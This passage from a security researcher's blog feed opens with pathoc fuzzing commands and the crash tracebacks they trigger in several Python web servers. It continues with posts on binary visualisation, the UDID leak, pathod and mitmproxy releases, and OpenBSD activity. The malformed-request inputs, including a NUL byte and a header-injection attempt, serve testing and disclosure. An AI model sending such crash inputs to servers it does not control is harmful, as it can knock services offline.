&quot;tornado/iostream.py&quot;, line 304, in 
wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 236, in _on_headers</span></span> <span class="giallo-l"><span> headers = httputil.HTTPHeaders.parse(data[eol:])</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 127, in parse</span></span> <span class="giallo-l"><span> h.parse_line(line)</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 113, in parse_line</span></span> <span class="giallo-l"><span> name, value = line.split(&quot;:&quot;, 1)</span></span> <span class="giallo-l"><span> ValueError: need more than 1 value to unpack</span></span> <span class="giallo-l"><span>[E ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012bd7e0&gt;</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;tornado/ioloop.py&quot;, line 421, in _run_callback</span></span> <span class="giallo-l"><span> callback()</span></span> <span class="giallo-l"><span> File &quot;tornado/iostream.py&quot;, line 304, in wrapper</span></span> <span class="giallo-l"><span> callback(*args)</span></span> <span class="giallo-l"><span> File &quot;tornado/httpserver.py&quot;, line 236, in _on_headers</span></span> <span class="giallo-l"><span> headers = httputil.HTTPHeaders.parse(data[eol:])</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 127, in parse</span></span> <span class="giallo-l"><span> h.parse_line(line)</span></span> <span class="giallo-l"><span> File &quot;tornado/httputil.py&quot;, line 113, in parse_line</span></span> <span class="giallo-l"><span> name, value = line.split(&quot;:&quot;, 1)</span></span> <span class="giallo-l"><span> ValueError: need more than 1 value to unpack</span></span></code></pre><h3 id="twisted">Twisted</h3> <pre class="giallo" 
style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>[HTTPChannel,4,127.0.0.1] Unhandled Error</span></span> <span class="giallo-l"><span> Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;twisted/python/log.py&quot;, line 84, in callWithLogger</span></span> <span class="giallo-l"><span> return callWithContext({&quot;system&quot;: lp}, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/log.py&quot;, line 69, in callWithContext</span></span> <span class="giallo-l"><span> return context.call({ILogContext: newCtx}, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/context.py&quot;, line 118, in callWithContext</span></span> <span class="giallo-l"><span> return self.currentContext().callWithContext(ctx, func, *args, **kw)</span></span> <span class="giallo-l"><span> File &quot;twisted/python/context.py&quot;, line 81, in callWithContext</span></span> <span class="giallo-l"><span> return func(*args,**kw)</span></span> <span class="giallo-l"><span> --- &lt;exception caught here&gt; ---</span></span> <span class="giallo-l"><span> File &quot;twisted/internet/selectreactor.py&quot;, line 150, in _doReadOrWrite</span></span> <span class="giallo-l"><span> why = getattr(selectable, method)()</span></span> <span class="giallo-l"><span> File &quot;twisted/internet/tcp.py&quot;, line 199, in doRead</span></span> <span class="giallo-l"><span> rval = self.protocol.dataReceived(data)</span></span> <span class="giallo-l"><span> File &quot;twisted/protocols/basic.py&quot;, line 564, in 
dataReceived</span></span> <span class="giallo-l"><span> why = self.lineReceived(line)</span></span> <span class="giallo-l"><span> File &quot;twisted/web/http.py&quot;, line 1558, in lineReceived</span></span> <span class="giallo-l"><span> self.headerReceived(self.__header)</span></span> <span class="giallo-l"><span> File &quot;twisted/web/http.py&quot;, line 1580, in headerReceived</span></span> <span class="giallo-l"><span> self.length = int(data)</span></span> <span class="giallo-l"><span> exceptions.ValueError: invalid literal for int() with base 10: &#39;x&#39;</span></span></code></pre><h3 id="simplehttp">SimpleHTTP</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:&quot;/\0&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>Exception happened during processing of request from (&#39;127.0.0.1&#39;, 54029)</span></span> <span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 284, in _handle_request_noblock</span></span> <span class="giallo-l"><span> self.process_request(request, client_address)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 310, in process_request</span></span> <span class="giallo-l"><span> self.finish_request(request, client_address)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 323, in finish_request</span></span> <span class="giallo-l"><span> self.RequestHandlerClass(request, client_address, self)</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SocketServer.py&quot;, line 638, in 
__init__</span></span> <span class="giallo-l"><span> self.handle()</span></span> <span class="giallo-l"><span> File &quot;python2.7/BaseHTTPServer.py&quot;, line 340, in handle</span></span> <span class="giallo-l"><span> self.handle_one_request()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/BaseHTTPServer.py&quot;, line 328, in handle_one_request</span></span> <span class="giallo-l"><span> method()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SimpleHTTPServer.py&quot;, line 44, in do_GET</span></span> <span class="giallo-l"><span> f = self.send_head()</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/SimpleHTTPServer.py&quot;, line 68, in send_head</span></span> <span class="giallo-l"><span> if os.path.isdir(path):</span></span> <span class="giallo-l"><span> File &quot;lib/python2.7/genericpath.py&quot;, line 41, in isdir</span></span> <span class="giallo-l"><span> st = os.stat(s)</span></span> <span class="giallo-l"><span>TypeError: must be encoded string without NULL bytes, not str</span></span></code></pre><h3 id="waitress">Waitress</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:i16,&quot; &quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>ERROR:waitress:uncaptured python exception, closing channel</span></span> <span class="giallo-l"><span>&lt;waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310&gt;</span></span> <span class="giallo-l"><span>(</span></span> <span class="giallo-l"><span> &lt;type &#39;exceptions.IndexError&#39;&gt;:list index out of range</span></span> <span class="giallo-l"><span> [lib/python2.7/asyncore.py|read|83]</span></span> <span 
class="giallo-l"><span> [lib/python2.7/asyncore.py|handle_read_event|444]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/channel.py|handle_read|169]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/channel.py|received|186]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|received|99]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|parse_header|158]</span></span> <span class="giallo-l"><span> [lib/python2.7/site-packages/waitress/parser.py|get_header_lines|247]</span></span> <span class="giallo-l"><span>)</span></span></code></pre> <p><strong>Edit: The first version of this post had examples that were due to the test WSGI application, not waitress. I've replaced them with the traceback above, which has been reformatted for clarity.</strong></p> <h3 id="werkzeug">Werkzeug</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">pathoc</span><span style="color: #005CC5;"> -p 8080</span><span style="color: #032F62;"> localhost &#39;get:/:h&quot;Host&quot;=&quot;n\r\0&quot;&#39;</span></span></code></pre><pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>Traceback (most recent call last):</span></span> <span class="giallo-l"><span> File &quot;flask/app.py&quot;, line 1518, in __call__</span></span> <span class="giallo-l"><span> return self.wsgi_app(environ, start_response)</span></span> <span class="giallo-l"><span> File &quot;flask/app.py&quot;, line 1507, in wsgi_app</span></span> <span class="giallo-l"><span> return response(environ, start_response)</span></span> <span class="giallo-l"><span> File &quot;/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py&quot;, line 1082, in __call__</span></span> <span class="giallo-l"><span> 
app_iter, status, headers = self.get_wsgi_response(environ)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/wrappers.py&quot;, line 1070, in get_wsgi_response</span></span> <span class="giallo-l"><span> headers = self.get_wsgi_headers(environ)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/wrappers.py&quot;, line 986, in get_wsgi_headers</span></span> <span class="giallo-l"><span> headers[&#39;Location&#39;] = location</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1132, in __setitem__</span></span> <span class="giallo-l"><span> self.set(key, value)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1097, in set</span></span> <span class="giallo-l"><span> self._validate_value(_value)</span></span> <span class="giallo-l"><span> File &quot;werkzeug/datastructures.py&quot;, line 1065, in _validate_value</span></span> <span class="giallo-l"><span> raise ValueError(&#39;Detected newline in header value. This is &#39;</span></span> <span class="giallo-l"><span>ValueError: Detected newline in header value. 
This is a potential security problem</span></span></code></pre> Limits of data visualization with space filling curves 2012-09-20T00:00:00+00:00 2012-09-20T00:00:00+00:00 https://corte.si/posts/visualisation/hilbert-snake/ <p>I recently wrote a <a href="https://corte.si/posts/visualisation/binvis/">series</a> of <a href="https://corte.si/posts/visualisation/entropy/">posts</a> using the <a href="https://corte.si/posts/code/hilbert/portrait/">Hilbert curve</a> to visualize binaries, culminating in a <a href="https://corte.si/posts/visualisation/malware/">gallery showing regions of high entropy in malware</a>.</p> <div class="media"> <a href="..&#x2F;malware&#x2F;08b983ec55bfd50d1d2cb9a90b1ae54e.html"> <img src="malwarexample.png" /> </a> </div> <p>The fact that the Hilbert curve has excellent locality preservation means that one dimensional features are preserved (as much as they can be) in the two-dimensional layout. This lets us visually pick out features of interest, and makes it possible, for instance, to quickly identify different malware packers just based on their layout characteristics.</p> <p>An obvious next step is to ask if it's possible to extend this idea to let us visually compare binaries, creating a sort of visual diff. Unfortunately, we now bump our heads against the limitations of space-filling curve visualization. I made the animation below after a recent conversation along these lines, and I think it illustrates the main issues nicely. It shows a single contiguous stretch of data (the black area) being shifted progressively through a binary. 
At each timestep, the only thing that changes is the starting location of the data block:</p> <div class="media"> <a href="hilbertsnake.gif"> <img src="hilbertsnake.gif" /> </a> </div> <p>Two things are immediately clear:</p> <ul> <li>The block of data doesn't retain its shape at different offsets - identical stretches of data can look totally different depending on their locations.</li> <li>There's no way to quickly see <em>where</em> in the binary a piece of information lies. Unless you are very familiar with the particular curve and know its exact orientation, you can't say, for instance, when the data block lies a third of the way through the binary.</li> </ul> <p>It's often worthwhile to trade off these things for locality preservation, but it definitely scotches certain use cases. I do wonder if it might be possible to tune the trade-off somewhat - sacrificing some locality preservation for better shape retention and offset estimation. I've toyed with some ideas along these lines (see the unrolled layouts in the <a href="https://corte.si/posts/visualisation/binvis/">binary visualization post</a>), but I still don't have a satisfying solution. If anyone out there knows of one, drop me a line.</p> Finding the UDID leak: a guessing game 2012-09-07T00:00:00+00:00 2012-09-07T00:00:00+00:00 https://corte.si/posts/security/udid-leak-guessing/ <p>It's become quite a popular parlor game to guess who is responsible for the recent Antisec UDID leak. I've now seen no fewer than six separate apps named as the probable source (two of which came from <a rel="external" href="http://www.marco.org">Marco Arment</a>). Before we pick the next culprit, I think it's worth taking a step back to consider the list of things we <em>don't</em> know:</p> <ul> <li>We don't know that we're dealing with just one source. The Antisec dump may well be an amalgam of data from various sources.</li> <li>We don't know that we're looking for just one app, or even a set of apps by one developer. 
The leak may well come from one of the myriad of 3rd party services which could be included in thousands of apps.</li> <li>We don't know that Antisec is being truthful about the scale of the database, or the additional data they claim is associated with the UDID/APNS records.</li> <li>We certainly don't know that the data was filched from an FBI laptop or that the NCFTA was in any way involved.</li> </ul> <p>Given all of these unknowns, I think a simple process-of-elimination approach to tracking down the leak will probably be fruitless, or worse, result in the finger being pointed at even more innocent parties. The one entity that may already have the answer to this question is Apple. They have a list of a million affected UDIDs, and they presumably have records of all apps that have ever used the associated push tokens. Given a large and precise sample like this, it should be possible to find the origin(s) of the leak reasonably easily. Indeed, if Apple is on the ball they may already have done this.</p> <p>Now for some frank speculation of my own. Let's assume for a moment that Antisec has been entirely truthful about the data, and that we're dealing with a single source. In that case, we're looking for:</p> <ul> <li>... an app or third-party service integrated into multiple apps</li> <li>... with 12 million or more users</li> <li>... that is APNS-enabled</li> <li>... which also gathers user data like real names and zip codes.</li> </ul> <p>I'll throw my hat in the ring and say that my money is on a third-party service, not a single app. If my hunch is right, the list of possible culprits is actually rather short.</p> The UDID leak is a privacy catastrophe 2012-09-04T00:00:00+00:00 2012-09-04T00:00:00+00:00 https://corte.si/posts/security/udid-leak/ <p>Something I've been worrying about for a long time has just happened: <a rel="external" href="http://pastebin.com/nfVT7b0Z">Antisec has leaked a database with more than a million UDIDs</a>. 
The UDID issue has been a bit of a white whale of mine - I've written many blog posts about it and spent more hours than I care to think about negotiating responsible disclosure with companies misusing UDIDs. Let's recap some of the posts I've written about this:</p> <ul> <li><a rel="external" href="http://corte.si/posts/security/openfeint-udid-deanonymization/index.html">In May 2011</a>, just before its sale to Gree was announced, I showed that <a rel="external" href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a> was misusing UDIDs in a way that allowed you to link a UDID to a user's identity, geolocation and Facebook and Twitter accounts. Although I didn't discuss it openly at the time, you could also completely take over an OpenFeint account, and access chat, forums, friends lists, and more using just a UDID. This resulted in a class-action lawsuit against OpenFeint, which has since petered out.</li> <li><a rel="external" href="http://corte.si/posts/security/apple-udid-survey/index.html">Later that month</a>, I published a survey looking at how UDIDs are used in practice. The data is now slightly out of date, but shows just how widely UDIDs are used and misused.</li> <li><a rel="external" href="http://corte.si/posts/security/udid-must-die/index.html">In September 2011</a>, I published the most troubling news so far, which paradoxically also got the least coverage in the press. I looked at <em>all</em> the gaming social networks on iOS - basically OpenFeint and its competitors - and found catastrophic mismanagement by nearly everyone. The vulnerabilities ranged from de-anonymization, to takeover of the user's gaming social network account, to the ability to completely take over the user's Facebook and Twitter accounts using just a UDID.</li> </ul> <p>As serious as these problems are, I'm afraid they're just the tip of the iceberg. 
Negotiating disclosure and trying to convince companies to fix their problems has taken literally months of my time, so I've stopped publishing on this issue for the moment. It's disheartening to say it, but some of the companies mentioned in my posts <em>still</em> have unfixed problems (they were all notified well in advance of any publication). I will also note ominously that I know of a number of similar vulnerabilities elsewhere in the iOS app ecosystem that I've just not had the time to pursue.</p> <p>When speaking to people about this, I've often been asked "What's the worst that can happen?". My response was always that the worst case scenario would be if a large database of UDIDs leaked... and here we are.</p> Defiler 2012-08-26T00:00:00+00:00 2012-08-26T00:00:00+00:00 https://corte.si/posts/photos/lymantriid/ <p>I've been living out of a bag for the last 3 weeks, working hard on a series of intense but fun audits. After running in high gear for a while I find that I need a mental palate cleanser - something to help me refocus and stop me from getting snowblind. I then grab my camera, strap on my macro rig, and walk out the door to try to catch the local wildlife in the act. It's become a bit of a game - the aim is to catch creatures in their natural setting and leave them completely undisturbed when I go, with no posing, prodding or other disturbances. Getting a usable shot of a 5mm target sitting on a twig swaying in the wind is a fun challenge.</p> <p>Today I find myself in Sydney, working in a part of the town that is shot through with unreasonably beautiful walking tracks. The place is also blessed with a huge diversity of invertebrate life that makes my <a rel="external" href="http://en.wikipedia.org/wiki/Dunedin">adopted home town</a> seem barren by comparison. I walked along a nearby track until I found a quiet, leafy spot, geared up, and leopard-crawled through the underbrush. 
Not long after, I came face-to-face with this imposing little chap sitting on the tip of a fern frond.</p> <div class="media"> <a href=".&#x2F;lymantriid2.jpg"> <img src=".&#x2F;lymantriid2.jpg" /> </a> </div> <p>This is a <a rel="external" href="http://en.wikipedia.org/wiki/Lymantriidae">Lymantriid</a> caterpillar of some variety, probably one of the tussock moths native to Australia. "Lymantria" means "defiler" - some species of this family can cause huge damage to foliage, and are considered to be destructive pests. So much so, that when a single male <a rel="external" href="http://en.wikipedia.org/wiki/Gypsy_moth">Gypsy Moth</a> (Lymantria dispar) was discovered in Hamilton, New Zealand, they sprayed the entire city with a caterpillar-specific <a rel="external" href="http://www.biosecurity.govt.nz/pests-diseases/forests/gypsy-moth/residents/foray.htm">bacterial insecticide</a>.</p> <p>No need for drastic measures with this particular fellow, though - he's native to this ecosystem, and the only pest is me and my camera. He was head down munching away when I found him, and paid absolutely no attention to me when I moved in close to get these shots. He's got reason to be cocksure, too - those tufts of hair on his back contain hollow, poison-filled spines that can cause a pretty unpleasant reaction when touched.</p> <div class="media"> <a href=".&#x2F;lymantriid1.jpg"> <img src=".&#x2F;lymantriid1.jpg" /> </a> </div> <p>A few hours exploring and photographing is a very effective brain-cleaner, leaving me ready to deal with spiny, venomous defilers of the digital variety.</p> pathod 0.2: the daemon gets an evil twin 2012-08-22T00:00:00+00:00 2012-08-22T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_2/ <p>I've just pushed pathod 0.2 out the door. 
This is a huge release, with many new features:</p> <ul> <li><a rel="external" href="http://pathod.net/docs/pathoc">pathoc</a>, pathod's evil client-side twin.</li> <li><a rel="external" href="http://pathod.net/docs/test">libpathod.test</a>, a framework for using pathod in your unit tests.</li> <li><a rel="external" href="http://pathod.net/docs/language">Improved mini language</a>, including many new abilities and improvements.</li> <li>A rewrite of the networking core.</li> </ul> <p>The project also has a new website at <a rel="external" href="http://pathod.net">pathod.net</a>. Yes, pathod is now self-hosting, so you can try out both pathod and pathoc specifications right on the website. There's also a new <a rel="external" href="http://public.pathod.net/200:b%22hello,%20sailor.%22">public pathod instance</a>, which I'm sure everyone will use entirely responsibly.</p> Introducing pathod: a pathological HTTP server 2012-05-01T00:00:00+00:00 2012-05-01T00:00:00+00:00 https://corte.si/posts/code/pathod/announce0_1/ <p>I've just released <a rel="external" href="http://cortesi.github.com/pathod%22">pathod</a>, a pathological HTTP/S daemon useful for testing and torturing HTTP clients. At its core is a tiny, terse language for crafting HTTP responses. It also has a built-in web interface that lets you play with the response spec language, inspect logs, and access pathod's full help document.</p> <p>The rest of this post is a quick teaser showing some of pathod's abilities. See the detailed documentation on the <a rel="external" href="http://cortesi.github.com/pathod%22">pathod site</a> if you want more.</p> <h2 id="the-simplest-possible-response">The simplest possible response</h2> <p>The easiest way to craft a response is to specify it directly in the request URL. Let's start with the simplest possible example. 
Start pathod, and then visit this URL:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>http://localhost:9999/p/200</span></span></code></pre> <p>The "/p/" path is the location of the response generator in pathod's default configuration - everything after that is a response specification in pathod's mini-language. The general form of a response spec is as follows:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>code[MESSAGE]:[colon-separated list of features]</span></span></code></pre> <p>In this case, we're specifying only the HTTP response code - that is, an HTTP 200 OK with no headers and no content, resulting in a response like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>HTTP/1.1 200 OK</span></span></code></pre><h2 id="specifying-features">Specifying features</h2> <p>One example of a "feature" is a response header. Let's embellish our response by adding one:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=&quot;foo&quot;</span></span></code></pre> <p>The first letter of the feature - "h", in this case - is a mnemonic indicating the type of feature we're adding. The full response to this spec looks like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>HTTP/1.1 200 OK</span></span> <span class="giallo-l"><span>Etag: foo</span></span></code></pre> <p>Both "Etag" and "foo" are Value Specifiers, a syntax used throughout the response specification language. In this case they are literal values, as indicated by the fact that they are quoted strings. The Value Specification syntax also lets us load values from files or generate random data. 
For instance, here is a specification that generates 100k of random binary data for the header value:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=@100k</span></span></code></pre> <p>Now, binary data in the header value will probably break things in interesting ways, but is unlikely to be read by the client as a valid (but over-long) value. To see if the client really drops off its perch if we feed it a single 100k header, we have to constrain the random data. Here's the same response, but with data generated only from ASCII letters:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>200:h&quot;Etag&quot;=@100k,ascii_letters</span></span></code></pre> <p>pathod has a large number of built-in character classes from which random data can be generated.</p> <h2 id="pauses-and-disconnects">Pauses and Disconnects</h2> <p>Next, we can disrupt the communications in various ways. At the moment, this means adding pauses and disconnects to a response. 
Let's start with an HTTP 404 response with a body consisting of 100k of random binary data:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k</span></span></code></pre> <p>Here's the same response, but with a 120 second pause after sending 100 bytes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:p120,100</span></span></code></pre> <p>And, the same response again, but with a hard disconnect after sending 100 bytes:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:d100</span></span></code></pre> <p>Instead of specifying a time explicitly, we can ask pathod to just randomly disconnect at a time of its choosing:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>404:b@100k:dr</span></span></code></pre> <p>That's it for the teaser - hopefully it's enough to entice you into looking at <a rel="external" href="http://cortesi.github.com/pathod%22">pathod</a>'s full documentation.</p> <h2 id="what-s-next">What's next?</h2> <p>pathod is an "airport project" - the first draft was written in its entirety during a 40-hour trip back home from New York (I drew a bad lot in stopovers). I've now firmed it up a bit, but there's still work to be done. In the next month, mitmproxy's test suite will move to pathod, after which there will be a simple, well-documented way to unit test. 
I also plan to build out the JSON API (which is used to drive pathod in test suites), and expand the mini-language with convenient ways to generate pathological cookies, authentication headers, SSL errors, and cache control.</p> mitmproxy 0.8 2012-04-09T00:00:00+00:00 2012-04-09T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_8/ <div class="media"> <a href="mitmproxy_0_8.png"> <img src="mitmproxy_0_8.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.8</a>. This release has a few major new features, big speedups, and many, many small bugfixes and improvements. Here are the headlines:</p> <h2 id="android-interception">Android interception</h2> <p>The most prominent new feature is that we now have a supported way to intercept Android traffic. What's more, we can do this without a cumbersome transparent proxying rig - see the <a rel="external" href="http://mitmproxy.org/doc/certinstall/android.html">Android section in the documentation</a> for the details. Special thanks goes to <a rel="external" href="http://twitter.com/yjmbo">Jim Cheetham</a> for lending me an Android device and helping to get this feature off the ground.</p> <h2 id="replacement-patterns">Replacement patterns</h2> <p>Another exceedingly useful new feature is <a rel="external" href="http://mitmproxy.org/doc/replacements.html">replacement patterns</a>. These consist of a filter, a regular expression and a replacement string, and run continuously while mitmproxy processes requests and responses. You can pass these either on the command-line, or using a built-in replacement pattern editor.</p> <div class="media"> <a href="mitmproxy0_8_replace.png"> <img src="mitmproxy0_8_replace.png" /> </a> </div> <p>I'm sure you can immediately think of many uses for this flexible feature, but my favourite is to use it during testing as a way to conveniently inject complicated exploits into web traffic. 
I do this by setting a replacement pattern that swaps a short but likely unique string (say MYXSS) for a long exploit, and then I use simple interaction and front-end tools like Firebug to inject exploits into requests manually based on the short string marker.</p> <h2 id="improved-pretty-printing-of-request-and-response-contents">Improved pretty-printing of request and response contents</h2> <p>This release of mitmproxy has a completely redesigned subsystem for pretty-printing request and response bodies. For instance, we now extract EXIF tags and other basic information to give you something better than a hex dump when looking at an image:</p> <div class="media"> <a href="mitmproxy0_8-pretty.png"> <img src="mitmproxy0_8-pretty.png" /> </a> </div> <p>We also have much improved HTML indenting (using <a rel="external" href="http://lxml.de/">lxml</a>), and a built-in JavaScript beautifier (thanks to <a rel="external" href="http://jsbeautifier.org">JSBeautifier</a>) that teases out compressed and obfuscated scripts into something readable.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Detailed tutorial for Android interception. Some features that land in this release have finally made reliable Android interception possible.</li> <li>Upstream-cert mode, which uses information from the upstream server to generate interception certificates.</li> <li>Replacement patterns that let you easily do global replacements in flows matching filter patterns. Can be specified on the command-line, or edited interactively.</li> <li>Much more sophisticated and usable pretty printing of request bodies. Support for auto-indentation of JavaScript, inspection of image EXIF data, and more.</li> <li>Details view for flows, showing connection and SSL cert information (X keyboard shortcut).</li> <li>Server certificates are now stored and serialized in saved traffic for later analysis. 
This means that the 0.8 serialization format is NOT compatible with 0.7.</li> <li>Add a shortcut key ("f") to load the remainder of a request or response body, if it is abbreviated.</li> <li>Many other improvements, including bugfixes, an expanded scripting API, and more sophisticated certificate handling.</li> </ul> mitmproxy 0.7 2012-02-27T00:00:00+00:00 2012-02-27T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce0_7/ <div class="media"> <a href="mitmproxy_0_7.png"> <img src="mitmproxy_0_7.png" /> </a> </div> <p>I'm happy to announce the release of <a rel="external" href="http://mitmproxy.org">mitmproxy 0.7</a>. The biggest visible change is a new structured editor for headers, query strings and form fields. Other new features include a reverse proxy mode, an extended script API that makes many common tasks much easier, and a myriad of improvements to the interface (including a massive increase in speed). Everybody still on 0.6 should upgrade - get it here:</p> <h2 id="mitmproxy-0-7-tar-gz-docs"><a rel="external" href="http://mitmproxy.org">mitmproxy-0.7.tar.gz</a> <a rel="external" href="http://mitmproxy.org/docs">(docs)</a></h2> <p>You can also now install mitmproxy using <a rel="external" href="http://pypi.python.org/pypi/pip">pip</a>, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> pip</span><span style="color: #032F62;"> install mitmproxy</span></span></code></pre> <p>In other news, the project has had an amazing month, after a rash of high-profile results obtained using mitmproxy were published. It started with <a rel="external" href="http://mclov.in/2012/02/08/path-uploads-your-entire-address-book-to-their-servers.html">Arun Thampi's discovery</a> that Path uploads users' address books to their servers. Things snowballed from there, and for a few days mitmproxy seemed to be everywhere. 
Similar findings were made for <a rel="external" href="http://markchang.tumblr.com/post/17244167951/hipster-uploads-part-of-your-iphone-address-book-to-its">Hipster</a>; <a rel="external" href="http://www.theverge.com/2012/2/14/2798008/ios-apps-and-the-address-book-what-you-need-to-know">The Verge</a> did a mitmproxy-driven AddressbookGate expose (including vaguely threatening background shots of mitmproxy doing its dastardly work), and lots of people said nice things on Twitter.</p> <p>To see the impact of all this on the mitmproxy project, you need only look at the <a rel="external" href="http://github.com/cortesi/mitmproxy">GitHub page</a> - watchers of the repo went from about 200 a month ago to 950 at the time of this post.</p> <h2 id="changelog">Changelog</h2> <ul> <li>New built-in key/value editor. This lets you interactively edit URL query strings, headers and URL-encoded form data.</li> <li>Extend script API to allow duplication and replay of flows.</li> <li>API for easy manipulation of URL-encoded forms and query strings.</li> <li>Add "D" shortcut in mitmproxy to duplicate a flow.</li> <li>Reverse proxy mode. In this mode mitmproxy acts as an HTTP server, forwarding all traffic to a specified upstream server.</li> <li>UI improvements - use Unicode characters to make GUI more compact, improve spacing and layout throughout.</li> <li>Add support for filtering by HTTP method.</li> <li>Add the ability to specify an HTTP body size limit.</li> <li>Move to typed netstrings for serialization format - this makes 0.7 backwards-incompatible with serialized data from 0.6!</li> <li>Significant improvements in speed and responsiveness of UI.</li> <li>Many minor bugfixes and improvements.</li> </ul> OpenBSD in decline? 2012-02-26T00:00:00+00:00 2012-02-26T00:00:00+00:00 https://corte.si/posts/security/openbsd-decline/ <p>My leisurely Sunday activity today is to set up a new <a rel="external" href="http://openbsd.org">OpenBSD</a> firewall for my mobile app testing lab. 
I haven't done a from-scratch OpenBSD install for years, so I spent some time reading through the change logs for the last few versions to catch up with what's changed. Although the project is clearly still making steady, well-engineered progress, I had the nagging feeling that the rate of change wasn't what it used to be. So, I pulled some numbers from <a rel="external" href="http://archives.neohapsis.com/archives/openbsd/cvs/">CVS commit message list archives</a>, and graphed them. Here is the number of commits per month from January 2001 to January 2012. The orange line is a simple 12-month moving average:</p> <div class="media"> <a href="commitspermonth.png"> <img src="commitspermonth.png" /> </a> </div> <p>Now, we should be cautious about interpreting this - the number of commits doesn't tell us anything about the quality, importance or magnitude of code change. Even if it did tell us all of these things, there are other and perhaps better measures of a project's health. Still, the trend is clear, and suggests a sustained decline in activity.</p> <p>I just <a rel="external" href="http://openbsd.org/orders.html">bought some T-shirts</a> to help support one of my favourite open source projects. 
